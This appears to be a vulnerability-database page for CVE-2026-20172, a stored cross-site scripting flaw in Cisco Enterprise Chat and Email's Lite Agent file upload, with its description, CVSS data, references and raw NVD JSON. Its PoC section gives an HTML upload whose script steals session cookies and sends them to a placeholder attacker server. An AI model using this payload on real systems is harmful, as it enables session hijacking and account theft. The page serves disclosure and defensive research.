CVE-2026-20172

Description

A vulnerability in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct browser-based attacks. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Agent. This vulnerability is due to inadequate validation of file contents during file upload operations. An attacker could exploit this vulnerability by uploading a file that contains malicious scripts or HTML code, which the application could make available to other users to access. A successful exploit could allow the attacker to execute the contents of that file in the browser of a user and conduct browser-based attacks. 

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Enterprise Chat and Email (ECE) (具体受影响版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2026-20172: Stored XSS via File Upload -->
<!-- Save this as an .html file and upload via the Lite Agent feature -->
<html>
<body>
<script>
  // Demonstrate execution of arbitrary JavaScript
  alert('CVE-2026-20172 Exploited: XSS Executed');
  
  // Example: Exfiltrate session cookies
  var cookies = document.cookie;
  var payload = encodeURIComponent(cookies);
  var url = 'http://attacker-controlled-server.com/collect?data=' + payload;
  
  // Send data to attacker (simulated)
  var img = new Image();
  img.src = url;
</script>
<h1>File Uploaded</h1>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20172
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20172
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20172/
[4] VulDB https://vuldb.com/cve/CVE-2026-20172
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-lite-agent-BCgSN8eb

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20172", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:20.880", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct browser-based attacks. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Agent.\r\n\r\nThis vulnerability is due to inadequate validation of file contents during file upload operations. An attacker could exploit this vulnerability by uploading a file that contains malicious scripts or HTML code, which the application could make available to other users to access. A successful exploit could allow the attacker to execute the contents of that file in the browser of a user and conduct browser-based attacks. "}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-646"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ece-lite-agent-BCgSN8eb", "source": "[email protected]"}]}}